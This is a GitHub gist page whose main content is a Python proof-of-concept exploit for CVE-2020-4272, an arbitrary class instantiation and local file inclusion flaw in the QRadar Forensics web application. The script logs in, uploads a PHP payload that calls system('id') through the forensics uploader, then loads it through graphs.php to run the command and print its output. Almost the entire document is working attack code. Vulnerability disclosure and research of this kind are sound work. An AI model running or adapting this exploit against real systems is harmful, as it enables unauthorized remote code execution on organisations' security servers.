Skip to content

Instantly share code, notes, and snippets.

@ykoster
Created April 16, 2020 07:55
Show Gist options
  • Save ykoster/81e4e21ec7e7703dd7f541d7efd22695 to your computer and use it in GitHub Desktop.
Save ykoster/81e4e21ec7e7703dd7f541d7efd22695 to your computer and use it in GitHub Desktop.
Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept
#!/usr/bin/env python3
import json
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict
base_url=f'https://127.0.0.1/'
username='admin'
password='initial'
verifycert=False
payload = '<?php system("id");exit();'
case_name = 'case1337'
if not verifycert:
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(f'{base_url}console/',
verify=verifycert, allow_redirects=False,
auth=requests.auth.HTTPBasicAuth(username, password))
if response.status_code != 302:
print(f"failed login as '{username}'")
exit(1)
cookies = cookiejar_from_dict({'SEC': response.cookies['SEC'], 'QRIF': response.cookies['SEC'], 'QRadarCSRF': response.cookies['QRadarCSRF']})
headers = {'Referer': f'{base_url}forensics/'}
url = f'{base_url}forensics/graphs.php'
files = {'files': ('payload.php', payload)}
data = {'case_name': case_name, 'upload_action': 'upload_pcap', 'QRadarCSRF': cookies['QRadarCSRF']}
url = f'{base_url}forensics/includes/jquery/uploader/server/php/index.php'
response = requests.post(url, files=files, data=data,
verify=verifycert, cookies=cookies, headers=headers)
json = json.loads(response.text)
url = f'{base_url}forensics/graphs.php?chart=WebSiteChart&dataset=/opt/ibm/forensics/case_input_staging/{case_name}/{json["files"][0]["name"][:-4]}'
response = requests.get(url, verify=verifycert, cookies=cookies, headers=headers)
print(response.text)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment